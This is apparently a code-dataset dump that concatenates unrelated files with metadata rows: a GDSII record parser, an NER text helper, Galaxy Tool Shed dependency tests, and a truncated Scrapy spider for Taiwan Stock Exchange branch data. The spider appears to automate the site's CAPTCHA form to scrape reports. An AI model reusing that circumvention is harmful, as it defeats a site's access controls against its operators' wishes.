.. moduleauthor:: Eugeniy Meshcheryakov <eugen@debian.org>
"""
import math
import struct
from datetime import datetime
from . import exceptions, tags, types
__all__ = ["Record", "Reader"]
_RECORD_HEADER_FMT = struct.Struct(">HH")
def _parse_nodata(data):
"""Parse :const:`NODATA` data type. Does nothing."""
def _parse_bitarray(data):
"""
Parse :const:`BITARRAY` data type.
>>> _parse_bitarray(b'ab') # ok, 2 bytes
24930
>>> _parse_bitarray(b'abcd') # too long
Traceback (most recent call last):
...
IncorrectDataSize: BITARRAY
>>> _parse_bitarray('') # zero bytes
Traceback (most recent call last):
...
IncorrectDataSize: BITARRAY
"""
if len(data) != 2:
raise exceptions.IncorrectDataSize("BITARRAY")
(val,) = struct.unpack(">H", data)
return val
def _parse_int2(data):
"""
Parse INT2 data type.
>>> _parse_int2(b'abcd') # ok, even number of bytes
(24930, 25444)
>>> _parse_int2(b'abcde') # odd number of bytes
Traceback (most recent call last):
...
IncorrectDataSize: INT2
>>> _parse_int2(b'') # zero bytes
Traceback (most recent call last):
...
IncorrectDataSize: INT2
"""
data_len = len(data)
if not data_len or (data_len % 2):
raise exceptions.IncorrectDataSize("INT2")
return struct.unpack(">%dh" % (data_len // 2), data)
def _parse_int4(data):
"""
Parse INT4 data type.
>>> _parse_int4(b'abcd')
(1633837924,)
>>> _parse_int4(b'abcdef') # not divisible by 4
Traceback (most recent call last):
...
IncorrectDataSize: INT4
>>> _parse_int4(b'') # zero bytes
Traceback (most recent call last):
...
IncorrectDataSize: INT4
"""
data_len = len(data)
if not data_len or (data_len % 4):
raise exceptions.IncorrectDataSize("INT4")
return struct.unpack(">%dl" % (data_len // 4), data)
def _int_to_real(num):
"""
Convert REAL8 from internal integer representation to Python reals.
Zeroes:
>>> print(_int_to_real(0x0))
0.0
>>> print(_int_to_real(0x8000000000000000)) # negative
0.0
>>> print(_int_to_real(0xff00000000000000)) # denormalized
0.0
Others:
>>> print(_int_to_real(0x4110000000000000))
1.0
>>> print(_int_to_real(0xC120000000000000))
-2.0
"""
sgn = -1 if 0x8000000000000000 & num else 1
mant = num & 0x00FFFFFFFFFFFFFF
exp = (num >> 56) & 0x7F
return math.ldexp(sgn * mant, 4 * (exp - 64) - 56)
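# Worked decoding example (derived from the logic above): for
# 0x4110000000000000 the sign bit is clear, the mantissa is
# 0x0010000000000000 == 2**52 and the biased exponent is 0x41 == 65,
# so the result is ldexp(2**52, 4*(65 - 64) - 56) == 2**52 * 2**-52 == 1.0.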
def _parse_real8(data):
"""
Parse REAL8 data type.
>>> _parse_real8(struct.pack('>3Q', 0x0, 0x4110000000000000, 0xC120000000000000))
(0.0, 1.0, -2.0)
>>> _parse_real8(b'') # zero bytes
Traceback (most recent call last):
...
IncorrectDataSize: REAL8
>>> _parse_real8(b'abcd') # not divisible by 8
Traceback (most recent call last):
...
IncorrectDataSize: REAL8
"""
data_len = len(data)
if not data_len or (data_len % 8):
raise exceptions.IncorrectDataSize("REAL8")
ints = struct.unpack(">%dQ" % (data_len // 8), data)
return tuple(_int_to_real(n) for n in ints)
def _parse_ascii(data):
r"""
Parse ASCII data type.
>>> _parse_ascii(b'') # zero bytes
Traceback (most recent call last):
...
IncorrectDataSize: ASCII
>>> _parse_ascii(b'abcde') == b'abcde'
True
>>> _parse_ascii(b'abcde\0') == b'abcde' # strips trailing NUL
True
"""
if not len(data):
raise exceptions.IncorrectDataSize("ASCII")
# XXX cross-version compatibility
if data[-1:] == b"\0":
return data[:-1]
return data
_PARSE_FUNCS = {
types.NODATA: _parse_nodata,
types.BITARRAY: _parse_bitarray,
types.INT2: _parse_int2,
types.INT4: _parse_int4,
types.REAL8: _parse_real8,
types.ASCII: _parse_ascii,
}
def _pack_nodata(data):
"""
    Pack NODATA tag data. Should always return an empty byte string::
>>> packed = _pack_nodata([])
>>> packed == b''
True
>>> len(packed)
0
"""
return b""
def _pack_bitarray(data):
"""
Pack BITARRAY tag data.
>>> packed = _pack_bitarray(123)
>>> packed == struct.pack('>H', 123)
True
>>> len(packed)
2
"""
return struct.pack(">H", data)
def _pack_int2(data):
"""
Pack INT2 tag data.
>>> _pack_int2([1, 2, -3]) == struct.pack('>3h', 1, 2, -3)
True
>>> packed = _pack_int2((1, 2, 3))
>>> packed == struct.pack('>3h', 1, 2, 3)
True
>>> len(packed)
6
"""
size = len(data)
return struct.pack(">{0}h".format(size), *data)
def _pack_int4(data):
"""
Pack INT4 tag data.
>>> _pack_int4([1, 2, -3]) == struct.pack('>3l', 1, 2, -3)
True
>>> packed = _pack_int4((1, 2, 3))
>>> packed == struct.pack('>3l', 1, 2, 3)
True
>>> len(packed)
12
"""
size = len(data)
return struct.pack(">{0}l".format(size), *data)
def _real_to_int(fnum):
"""
Convert REAL8 from Python real to internal integer representation.
>>> '0x%016x' % _real_to_int(0.0)
'0x0000000000000000'
>>> print(_int_to_real(_real_to_int(1.0)))
1.0
>>> print(_int_to_real(_real_to_int(-2.0)))
-2.0
>>> print(_int_to_real(_real_to_int(1e-9)))
1e-09
"""
# first convert number to IEEE double and split it in parts
(ieee,) = struct.unpack("=Q", struct.pack("=d", fnum))
sign = ieee & 0x8000000000000000
ieee_exp = (ieee >> 52) & 0x7FF
ieee_mant = ieee & 0xFFFFFFFFFFFFF
if ieee_exp == 0:
# zero or denormals
# TODO maybe handle denormals
return 0
    # subtract the exponent bias
unb_ieee_exp = ieee_exp - 1023
# add leading one and move to GDSII position
ieee_mant_full = (ieee_mant + 0x10000000000000) << 3
    # convert the exponent to base 16; +1 accounts for the difference in
    # mantissa presentation (1.xxxx in IEEE vs 0.1xxxxx in GDSII)
exp16, rest = divmod(unb_ieee_exp + 1, 4)
    # compensate for the exponent conversion
if rest:
rest = 4 - rest
exp16 += 1
ieee_mant_comp = ieee_mant_full >> rest
# add GDSII exponent bias
exp16_biased = exp16 + 64
# try to fit everything
    if exp16_biased < -14:
        return 0  # number is too small. FIXME is it possible?
    elif exp16_biased < 0:
        # shift count must be non-negative; exp16_biased is negative here
        ieee_mant_comp = ieee_mant_comp >> (-exp16_biased * 4)
        exp16_biased = 0
elif exp16_biased > 0x7F:
raise exceptions.FormatError("number is to big for REAL8")
return sign | (exp16_biased << 56) | ieee_mant_comp
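# Worked encoding example (a step-by-step trace of the function above):
# for 1.0 the IEEE bits give sign=0, ieee_exp=1023 and ieee_mant=0, so
# unb_ieee_exp == 0 and ieee_mant_full == 0x10000000000000 << 3 == 2**55.
# divmod(0 + 1, 4) gives exp16=0, rest=1, compensated to rest=3, exp16=1,
# so the mantissa becomes 2**55 >> 3 == 2**52 and the biased exponent
# 1 + 64 == 65 (0x41). The packed result is (65 << 56) | 2**52 ==
# 0x4110000000000000, matching the _int_to_real doctest above.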
def _pack_real8(data):
"""
Pack REAL8 tag data.
>>> packed = _pack_real8([0, 1, -1, 0.5, 1e-9])
>>> len(packed)
40
>>> list(map(str, _parse_real8(packed)))
['0.0', '1.0', '-1.0', '0.5', '1e-09']
"""
size = len(data)
return struct.pack(">{0}Q".format(size), *[_real_to_int(num) for num in data])
def _pack_ascii(data):
r"""
Pack ASCII tag data.
>>> _pack_ascii(b'abcd') == b'abcd'
True
>>> _pack_ascii(b'abc') == b'abc\0'
True
"""
size = len(data)
if size % 2:
return data + b"\0"
return data
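# GDSII records must have an even byte length (Record.read below rejects
# odd sizes), hence the NUL pad for odd-length strings here and the
# matching trailing-NUL strip in _parse_ascii.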
_PACK_FUNCS = {
types.NODATA: _pack_nodata,
types.BITARRAY: _pack_bitarray,
types.INT2: _pack_int2,
types.INT4: _pack_int4,
types.REAL8: _pack_real8,
types.ASCII: _pack_ascii,
}
class Record(object):
"""
Class for representing a GDSII record with attached data.
Example::
>>> r = Record(tags.STRNAME, 'my_structure')
>>> '%04x' % r.tag
'0606'
>>> r.tag_name
'STRNAME'
>>> r.tag_type
6
>>> r.tag_type_name
'ASCII'
>>> r.data
'my_structure'
>>> r = Record(0xffff, 'xxx') # Unknown tag type
>>> r.tag_name
'0xffff'
>>> r.tag_type_name
'0xff'
"""
__slots__ = ["tag", "data"]
def __init__(self, tag, data=None, points=None, times=None, acls=None):
"""Initialize with tag and parsed data."""
self.tag = tag
if data is not None:
self.data = data
elif points is not None:
new_data = []
# TODO make it faster
for point in points:
new_data.append(point[0])
new_data.append(point[1])
self.data = new_data
elif times is not None:
mod_time = times[0]
acc_time = times[1]
self.data = (
mod_time.year - 1900,
mod_time.month,
mod_time.day,
mod_time.hour,
mod_time.minute,
mod_time.second,
acc_time.year - 1900,
acc_time.month,
acc_time.day,
acc_time.hour,
acc_time.minute,
acc_time.second,
)
elif acls is not None:
new_data = []
for acl in acls:
new_data.extend(acl)
self.data = new_data
else:
self.data = None
def check_tag(self, tag):
"""
Checks if current record has the same tag as the given one.
Raises :exc:`MissingRecord` exception otherwise. For example::
>>> rec = Record(tags.STRNAME, b'struct')
>>> rec.check_tag(tags.STRNAME)
>>> rec.check_tag(tags.DATATYPE)
Traceback (most recent call last):
...
MissingRecord: Wanted: 3586, got: STRNAME
"""
if self.tag != tag:
raise exceptions.MissingRecord("Wanted: %s, got: %s" % (tag, self.tag_name))
def check_size(self, size):
"""
        Checks whether the data size equals the given size.
Raises :exc:`DataSizeError` otherwise. For example::
>>> rec = Record(tags.DATATYPE, (0,))
>>> rec.check_size(1)
>>> rec.check_size(5)
Traceback (most recent call last):
...
DataSizeError: 3586
"""
if len(self.data) != size:
raise exceptions.DataSizeError(self.tag)
@classmethod
def read(cls, stream):
"""
Read a GDSII record from file.
:param stream: GDS file opened for reading in binary mode
:returns: a new :class:`Record` instance
:raises: :exc:`UnsupportedTagType` if data cannot be parsed
:raises: :exc:`EndOfFileError` if end of file is reached
"""
header = stream.read(4)
if not header or len(header) != 4:
raise exceptions.EndOfFileError
data_size, tag = _RECORD_HEADER_FMT.unpack(header)
if data_size < 4:
raise exceptions.IncorrectDataSize("data size is too small")
if data_size % 2:
raise exceptions.IncorrectDataSize("data size is odd")
        data_size -= 4  # subtract header size
data = stream.read(data_size)
if len(data) != data_size:
raise exceptions.EndOfFileError
tag_type = tags.type_of_tag(tag)
try:
parse_func = _PARSE_FUNCS[tag_type]
except KeyError:
raise exceptions.UnsupportedTagType(tag_type)
return cls(tag, parse_func(data))
def save(self, stream):
"""
Save record to a GDS file.
:param stream: file opened for writing in binary mode
:raises: :exc:`UnsupportedTagType` if tag type is not supported
:raises: :exc:`FormatError` on incorrect data sizes, etc
:raises: whatever :func:`struct.pack` can raise
"""
tag_type = self.tag_type
try:
pack_func = _PACK_FUNCS[tag_type]
except KeyError:
raise exceptions.UnsupportedTagType(tag_type)
packed_data = pack_func(self.data)
record_size = len(packed_data) + 4
if record_size > 0xFFFF:
raise exceptions.FormatError("data size is too big")
header = _RECORD_HEADER_FMT.pack(record_size, self.tag)
stream.write(header)
stream.write(packed_data)
@property
def tag_name(self):
"""Tag name, if known, otherwise tag ID formatted as hex number."""
if self.tag in tags.REV_DICT:
return tags.REV_DICT[self.tag]
return "0x%04x" % self.tag
@property
def tag_type(self):
"""Tag data type ID."""
return tags.type_of_tag(self.tag)
@property
def tag_type_name(self):
"""Tag data type name, if known, and formatted number otherwise."""
tag_type = tags.type_of_tag(self.tag)
if tag_type in types.REV_DICT:
return types.REV_DICT[tag_type]
return "0x%02x" % tag_type
@property
def points(self):
"""
Convert data to list of points. Useful for :const:`XY` record.
Raises :exc:`DataSizeError` if data size is incorrect.
For example::
>>> r = Record(tags.XY, [0, 1, 2, 3])
>>> r.points
[(0, 1), (2, 3)]
>>> r = Record(tags.XY, []) # not allowed
>>> r.points
Traceback (most recent call last):
...
DataSizeError: 4099
>>> r = Record(tags.XY, [1, 2, 3]) # odd number of coordinates
>>> r.points
Traceback (most recent call last):
...
DataSizeError: 4099
"""
data_size = len(self.data)
if not data_size or (data_size % 2):
raise exceptions.DataSizeError(self.tag)
return [(self.data[i], self.data[i + 1]) for i in range(0, data_size, 2)]
@property
def times(self):
"""
Convert data to tuple ``(modification time, access time)``.
Useful for :const:`BGNLIB` and :const:`BGNSTR`.
>>> r = Record(tags.BGNLIB, [100, 1, 1, 1, 2, 3, 110, 8, 14, 21, 10, 35])
>>> print(r.times[0].isoformat())
2000-01-01T01:02:03
>>> print(r.times[1].isoformat())
2010-08-14T21:10:35
>>> r = Record(tags.BGNLIB, [100, 1, 1, 1, 2, 3]) # wrong data length
>>> r.times
Traceback (most recent call last):
...
DataSizeError: 258
"""
if len(self.data) != 12:
raise exceptions.DataSizeError(self.tag)
return (
datetime(self.data[0] + 1900, *self.data[1:6]),
datetime(self.data[6] + 1900, *self.data[7:12]),
)
@property
def acls(self):
"""
Convert data to list of acls ``(GID, UID, ACCESS)``.
Useful for :const:`LIBSECUR`.
>>> r = Record(tags.LIBSECUR, [1, 2, 3, 4, 5, 6])
>>> r.acls
[(1, 2, 3), (4, 5, 6)]
>>> r = Record(tags.LIBSECUR, [1, 2, 3, 4]) # wrong data size
>>> r.acls
Traceback (most recent call last):
...
DataSizeError: 15106
"""
if len(self.data) % 3:
raise exceptions.DataSizeError(self.tag)
return list(zip(self.data[::3], self.data[1::3], self.data[2::3]))
@classmethod
def iterate(cls, stream):
"""
Generator function for iterating over all records in a GDSII file.
Yields :class:`Record` objects.
:param stream: GDS file opened for reading in binary mode
"""
last = False
while not last:
rec = cls.read(stream)
if rec.tag == tags.ENDLIB:
last = True
yield rec
class Reader(object):
"""Class for buffered reading of Records"""
__slots__ = ("current", "stream")
def __init__(self, stream):
self.stream = stream
def read_next(self):
"""Read and return next record from stream."""
self.current = Record.read(self.stream)
return self.current
if __name__ == "__main__":
import doctest
doctest.testmod(optionflags=doctest.IGNORE_EXCEPTION_DETAIL)
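# Minimal usage sketch (assumes 'library.gds' is an existing GDSII file):
#
#     with open('library.gds', 'rb') as stream:
#         for rec in Record.iterate(stream):
#             print(rec.tag_name, rec.tag_type_name, rec.data)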
| 28.845258 | 89 | 0.55728 | 2,134 | 17,336 | 4.379569 | 0.194939 | 0.014231 | 0.005136 | 0.036914 | 0.242992 | 0.215172 | 0.141986 | 0.096405 | 0.074577 | 0.040552 | 0 | 0.051362 | 0.318297 | 17,336 | 600 | 90 | 28.893333 | 0.739381 | 0.464871 | 0 | 0.15625 | 0 | 0 | 0.028346 | 0 | 0 | 0 | 0.01322 | 0.003333 | 0 | 1 | 0.125 | false | 0 | 0.022321 | 0 | 0.285714 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a8566907344117140f18d19e73cdf9613f31abbd | 4,778 | py | Python | texts/objects/helper.py | nicolay-r/frame-based-attitude-extraction-workflow | f20e6d17a9eb6613028545b889c74626a8260ccd | [
"MIT"
] | null | null | null | texts/objects/helper.py | nicolay-r/frame-based-attitude-extraction-workflow | f20e6d17a9eb6613028545b889c74626a8260ccd | [
"MIT"
] | 6 | 2020-10-03T13:45:38.000Z | 2021-07-13T18:31:57.000Z | texts/objects/helper.py | nicolay-r/frame-based-attitude-extraction-workflow | f20e6d17a9eb6613028545b889c74626a8260ccd | [
"MIT"
] | null | null | null | from collections import Iterable
from core.processing.ner.obj_decs import NerObjectDescriptor
from texts.objects.authorized.collection import AuthorizedObjectsCollection
from texts.objects.authorized.object import AuthTextObject
class TextObjectHelper:
def __init__(self):
pass
@staticmethod
def __optionally_fix(term, template, remove):
if template not in term:
return term
if not remove:
# Perform cut operation
from_ind = term.index(template)
if from_ind > 0:
return term[:from_ind]
else:
# Removing the related template.
return term.replace(template, "")
return term
@staticmethod
def fix_terms_inplace(input_terms):
"""
        Remove extra garbage that was not captured by the text reader.
"""
for i, term in enumerate(input_terms):
# Optionally remove "e.
upd_term = TextObjectHelper.__optionally_fix(term=term, template='"', remove=True)
# Optionally cut everything till &#CODE.
upd_term = TextObjectHelper.__optionally_fix(term=upd_term, template='&#', remove=False)
# Extra tags.
upd_term = TextObjectHelper.__optionally_fix(term=upd_term, template='<', remove=False)
input_terms[i] = upd_term
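    # Worked example of the fixes above with hypothetical inputs:
    #   ['"Paris', 'London&#8212;', 'Berlin<br>']
    # becomes
    #   ['Paris', 'London', 'Berlin']
    # ('"' is removed in place; '&#' and '<' cut the term at the template).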
@staticmethod
def try_fix_object_value(obj_desc, input_terms, is_term_func, check_obj_includes_non_term=True):
assert(isinstance(obj_desc, NerObjectDescriptor))
assert(isinstance(input_terms, list))
assert(callable(is_term_func))
r_len = obj_desc.Length
i, j = obj_desc.get_range()
j -= 1
# Crop from non-terms at left and right object bounds.
changed = False
while not is_term_func(i) or not is_term_func(j):
if not is_term_func(i):
i += 1
r_len -= 1
changed = True
if not is_term_func(j):
j -= 1
r_len -= 1
changed = True
if i >= len(input_terms):
break
if j == 0:
break
if i > j:
break
if i > j:
return None
if check_obj_includes_non_term:
for index in range(i, j+1):
if not is_term_func(index):
return None
if not changed:
return obj_desc
return NerObjectDescriptor(pos=i,
length=r_len,
obj_type=obj_desc.ObjectType)
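    # Illustrative example (hypothetical values): if a NER object spans term
    # indices [2, 5] but is_term_func reports index 2 as a non-term (e.g.
    # punctuation), the bounds are cropped to [3, 5] and a descriptor with
    # pos=3 and length=3 is returned instead.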
@staticmethod
def iter_missed_objects(lemmas_list, existed_objects, auth_objects, get_collection_ind_func):
assert(isinstance(lemmas_list, list))
assert(isinstance(existed_objects, Iterable))
assert(isinstance(auth_objects, AuthorizedObjectsCollection))
assert(callable(get_collection_ind_func))
used = [False] * len(lemmas_list)
for obj in existed_objects:
bound = obj.get_bound()
i = bound.TermIndex
while i < bound.TermIndex + bound.Length:
used[i] = True
i += 1
position = 0
while position < len(used):
if used[position]:
position += 1
continue
max_term_length = 1
while max_term_length < auth_objects.MaxTermLength:
index = position + max_term_length
if index >= len(used):
break
if used[index]:
break
max_term_length += 1
next_position = position + 1
for r_offset in reversed(list(range(max_term_length))):
last_term_index = position + r_offset
if not (last_term_index < len(used)):
position = next_position
break
terms = lemmas_list[position:last_term_index+1]
lemma_value = ' '.join(terms)
if not auth_objects.has_value(lemma_value):
if r_offset == 0:
position = next_position
break
else:
continue
yield AuthTextObject(terms=terms,
position=position,
is_auth=True,
obj_type="UNKN",
description="restored",
collection_ind=get_collection_ind_func())
position = last_term_index + 1
break
| 31.025974 | 100 | 0.53244 | 496 | 4,778 | 4.879032 | 0.247984 | 0.014463 | 0.028926 | 0.02686 | 0.154132 | 0.086777 | 0.070248 | 0.054545 | 0.054545 | 0.054545 | 0 | 0.005925 | 0.39954 | 4,778 | 153 | 101 | 31.228758 | 0.837574 | 0.051486 | 0 | 0.296296 | 0 | 0 | 0.004665 | 0 | 0 | 0 | 0 | 0 | 0.064815 | 1 | 0.046296 | false | 0.009259 | 0.037037 | 0 | 0.166667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a85705db77f222ff628abe4c8a385fc228d7d2bd | 9,539 | py | Python | data/train/python/a85705db77f222ff628abe4c8a385fc228d7d2bdtest_0110_invalid_simple_repository_dependencies.py | harshp8l/deep-learning-lang-detection | 2a54293181c1c2b1a2b840ddee4d4d80177efb33 | [
"MIT"
] | 84 | 2017-10-25T15:49:21.000Z | 2021-11-28T21:25:54.000Z | data/train/python/a85705db77f222ff628abe4c8a385fc228d7d2bdtest_0110_invalid_simple_repository_dependencies.py | vassalos/deep-learning-lang-detection | cbb00b3e81bed3a64553f9c6aa6138b2511e544e | [
"MIT"
] | 5 | 2018-03-29T11:50:46.000Z | 2021-04-26T13:33:18.000Z | data/train/python/a85705db77f222ff628abe4c8a385fc228d7d2bdtest_0110_invalid_simple_repository_dependencies.py | vassalos/deep-learning-lang-detection | cbb00b3e81bed3a64553f9c6aa6138b2511e544e | [
"MIT"
] | 24 | 2017-11-22T08:31:00.000Z | 2022-03-27T01:22:31.000Z | from tool_shed.base.twilltestcase import common, ShedTwillTestCase
datatypes_repository_name = 'emboss_datatypes_0110'
datatypes_repository_description = "Galaxy applicable data formats used by Emboss tools."
datatypes_repository_long_description = "Galaxy applicable data formats used by Emboss tools. This repository contains no tools."
emboss_repository_name = 'emboss_0110'
emboss_repository_description = 'Galaxy wrappers for Emboss version 5.0.0 tools'
emboss_repository_long_description = 'Galaxy wrappers for Emboss version 5.0.0 tools'
category_name = 'Test 0110 Invalid Repository Dependencies'
category_desc = 'Test 0110 Invalid Repository Dependencies'
class TestBasicRepositoryDependencies( ShedTwillTestCase ):
    '''Testing emboss 5 with invalid repository dependencies.'''
def test_0000_initiate_users( self ):
"""Create necessary user accounts and login as an admin user."""
self.logout()
self.login( email=common.test_user_1_email, username=common.test_user_1_name )
test_user_1 = self.test_db_util.get_user( common.test_user_1_email )
assert test_user_1 is not None, 'Problem retrieving user with email %s from the database' % common.test_user_1_email
self.test_db_util.get_private_role( test_user_1 )
self.logout()
self.login( email=common.admin_email, username=common.admin_username )
admin_user = self.test_db_util.get_user( common.admin_email )
assert admin_user is not None, 'Problem retrieving user with email %s from the database' % common.admin_email
self.test_db_util.get_private_role( admin_user )
def test_0005_create_category( self ):
"""Create a category for this test suite"""
self.create_category( name=category_name, description=category_desc )
def test_0010_create_emboss_datatypes_repository_and_upload_tarball( self ):
'''Create and populate the emboss_datatypes repository.'''
self.logout()
self.login( email=common.test_user_1_email, username=common.test_user_1_name )
category = self.test_db_util.get_category_by_name( category_name )
repository = self.get_or_create_repository( name=datatypes_repository_name,
description=datatypes_repository_description,
long_description=datatypes_repository_long_description,
owner=common.test_user_1_name,
category_id=self.security.encode_id( category.id ),
strings_displayed=[] )
self.upload_file( repository,
filename='emboss/datatypes/datatypes_conf.xml',
filepath=None,
valid_tools_only=True,
uncompress_file=True,
remove_repo_files_not_in_tar=False,
commit_message='Uploaded datatypes_conf.xml.',
strings_displayed=[],
strings_not_displayed=[] )
def test_0015_verify_datatypes_in_datatypes_repository( self ):
'''Verify that the emboss_datatypes repository contains datatype entries.'''
repository = self.test_db_util.get_repository_by_name_and_owner( datatypes_repository_name, common.test_user_1_name )
self.display_manage_repository_page( repository, strings_displayed=[ 'Datatypes', 'equicktandem', 'hennig86', 'vectorstrip' ] )
def test_0020_create_emboss_5_repository_and_upload_files( self ):
'''Create and populate the emboss_5_0110 repository.'''
category = self.test_db_util.get_category_by_name( category_name )
repository = self.get_or_create_repository( name=emboss_repository_name,
description=emboss_repository_description,
long_description=emboss_repository_long_description,
owner=common.test_user_1_name,
category_id=self.security.encode_id( category.id ),
strings_displayed=[] )
self.upload_file( repository,
filename='emboss/emboss.tar',
filepath=None,
valid_tools_only=True,
uncompress_file=True,
remove_repo_files_not_in_tar=False,
commit_message='Uploaded emboss tool tarball.',
strings_displayed=[],
strings_not_displayed=[] )
def test_0025_generate_repository_dependency_with_invalid_url( self ):
'''Generate a repository dependency for emboss 5 with an invalid URL.'''
dependency_path = self.generate_temp_path( 'test_0110', additional_paths=[ 'simple' ] )
datatypes_repository = self.test_db_util.get_repository_by_name_and_owner( datatypes_repository_name, common.test_user_1_name )
emboss_repository = self.test_db_util.get_repository_by_name_and_owner( emboss_repository_name, common.test_user_1_name )
url = 'http://http://this is not an url!'
name = datatypes_repository.name
owner = datatypes_repository.user.username
changeset_revision = self.get_repository_tip( datatypes_repository )
strings_displayed = [ 'Repository dependencies are currently supported only within the same tool shed' ]
repository_tuple = ( url, name, owner, changeset_revision )
self.create_repository_dependency( repository=emboss_repository,
filepath=dependency_path,
repository_tuples=[ repository_tuple ],
strings_displayed=strings_displayed,
complex=False )
def test_0030_generate_repository_dependency_with_invalid_name( self ):
'''Generate a repository dependency for emboss 5 with an invalid name.'''
dependency_path = self.generate_temp_path( 'test_0110', additional_paths=[ 'simple' ] )
repository = self.test_db_util.get_repository_by_name_and_owner( datatypes_repository_name, common.test_user_1_name )
emboss_repository = self.test_db_util.get_repository_by_name_and_owner( emboss_repository_name, common.test_user_1_name )
url = self.url
name = '!?invalid?!'
owner = repository.user.username
changeset_revision = self.get_repository_tip( repository )
strings_displayed = [ 'because the name is invalid.' ]
repository_tuple = ( url, name, owner, changeset_revision )
self.create_repository_dependency( repository=emboss_repository,
filepath=dependency_path,
repository_tuples=[ repository_tuple ],
strings_displayed=strings_displayed,
complex=False )
def test_0035_generate_repository_dependency_with_invalid_owner( self ):
'''Generate a repository dependency for emboss 5 with an invalid owner.'''
dependency_path = self.generate_temp_path( 'test_0110', additional_paths=[ 'simple' ] )
repository = self.test_db_util.get_repository_by_name_and_owner( datatypes_repository_name, common.test_user_1_name )
emboss_repository = self.test_db_util.get_repository_by_name_and_owner( emboss_repository_name, common.test_user_1_name )
url = self.url
name = repository.name
owner = '!?invalid?!'
changeset_revision = self.get_repository_tip( repository )
strings_displayed = [ 'because the owner is invalid.' ]
repository_tuple = ( url, name, owner, changeset_revision )
self.create_repository_dependency( repository=emboss_repository,
filepath=dependency_path,
repository_tuples=[ repository_tuple ],
strings_displayed=strings_displayed,
complex=False )
def test_0040_generate_repository_dependency_with_invalid_changeset_revision( self ):
'''Generate a repository dependency for emboss 5 with an invalid changeset revision.'''
dependency_path = self.generate_temp_path( 'test_0110', additional_paths=[ 'simple', 'invalid' ] )
repository = self.test_db_util.get_repository_by_name_and_owner( datatypes_repository_name, common.test_user_1_name )
emboss_repository = self.test_db_util.get_repository_by_name_and_owner( emboss_repository_name, common.test_user_1_name )
url = self.url
name = repository.name
owner = repository.user.username
changeset_revision = '!?invalid?!'
strings_displayed = [ 'because the changeset revision is invalid.' ]
repository_tuple = ( url, name, owner, changeset_revision )
self.create_repository_dependency( repository=emboss_repository,
filepath=dependency_path,
repository_tuples=[ repository_tuple ],
strings_displayed=strings_displayed,
complex=False )
| 64.891156 | 135 | 0.645875 | 1,012 | 9,539 | 5.695652 | 0.13834 | 0.027759 | 0.031228 | 0.04424 | 0.72762 | 0.683727 | 0.660479 | 0.636537 | 0.625087 | 0.59195 | 0 | 0.015777 | 0.289024 | 9,539 | 146 | 136 | 65.335616 | 0.83412 | 0.063214 | 0 | 0.581967 | 0 | 0 | 0.102983 | 0.006303 | 0 | 0 | 0 | 0 | 0.016393 | 1 | 0.07377 | false | 0 | 0.008197 | 0 | 0.090164 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a85887d35309a8a0a9e6464edc0775b4eb8e590c | 3,752 | py | Python | exchanges/twse/spiders/stock/branch.py | shwang-bk/fin4crawl | 3c86add7c30817b1d739e510c321f631a43b9c71 | [
"MIT"
] | 1 | 2020-03-26T14:46:55.000Z | 2020-03-26T14:46:55.000Z | exchanges/twse/spiders/stock/branch.py | shwang-bk/fin4crawl | 3c86add7c30817b1d739e510c321f631a43b9c71 | [
"MIT"
] | null | null | null | exchanges/twse/spiders/stock/branch.py | shwang-bk/fin4crawl | 3c86add7c30817b1d739e510c321f631a43b9c71 | [
"MIT"
] | 1 | 2021-04-10T00:53:14.000Z | 2021-04-10T00:53:14.000Z | import datetime
import scrapy
from scrapy.loader import ItemLoader
from itemloaders.processors import MapCompose, TakeFirst
from exchanges.twse.items import BranchSettlementItem
from exchanges.twse.handlers import StockBranchHandler as Handler
class BranchSettlementSpider(scrapy.Spider):
name = 'twse_branch_settlement'
allowed_domains = ['bsr.twse.com.tw']
date = datetime.date.today().strftime("%Y%m%d")
def __init__(self, *args, **kwargs):
super(BranchSettlementSpider, self).__init__(*args, **kwargs)
        # use two separate lists; a chained assignment would alias them
        self.processed = []
        self.total = []
def start_requests(self):
self.logger.info(f'Parsing date: {self.date}')
self.total = Handler.load_symbols()
if self.total:
for symbol in self.total:
req = Handler.new_request(symbol, self.parse, self.on_error)
yield scrapy.Request(**req)
else:
req = Handler.stocks_request(self.date, self.parse_stocks, None)
yield scrapy.Request(**req)
def parse_stocks(self, response):
self.total = Handler.get_symbols(response)
for symbol in self.total:
req = Handler.new_request(symbol, self.parse, self.on_error)
yield scrapy.Request(**req)
def parse(self, response):
if Handler.check_download_link(response):
yield scrapy.Request(url=Handler.content_url, meta=response.meta, encoding='cp950',
callback=self.parse_csv, errback=self.on_error, dont_filter=True)
else:
response.meta['form'] = Handler.new_form(response)
yield scrapy.Request(url=Handler.get_img_url(response), meta=response.meta,
callback=self.parse_img, errback=self.on_error, dont_filter=True)
def parse_img(self, response):
form = response.meta['form']
form = Handler.update_form(response, form)
yield scrapy.FormRequest(url=Handler.menu_url, meta=response.meta, formdata=form,
callback=self.parse, errback=self.on_error, dont_filter=True)
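    # The parse -> parse_img -> parse chain above retries the TWSE report
    # page: when no CSV download link is present yet, the CAPTCHA image is
    # fetched, the form is updated (its solution is presumably filled in by
    # Handler.update_form), and the menu page is re-posted until a download
    # link appears.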
def parse_csv(self, response):
rows = response.body_as_unicode().split('\n')
rows = [row for row in rows if row.count(',') == 10 and ('券商' not in row)]
for row in rows:
row = row.split(',')
yield self.parse_raw(response.meta['symbol'], row[1:5])
yield self.parse_raw(response.meta['symbol'], row[7:])
self.processed.append(response.meta['symbol'])
self.logger.info(f"({len(self.processed)}/{len(self.total)}) {response.meta['symbol']} [{len(rows)} rows]")
def parse_raw(self, symbol, raw):
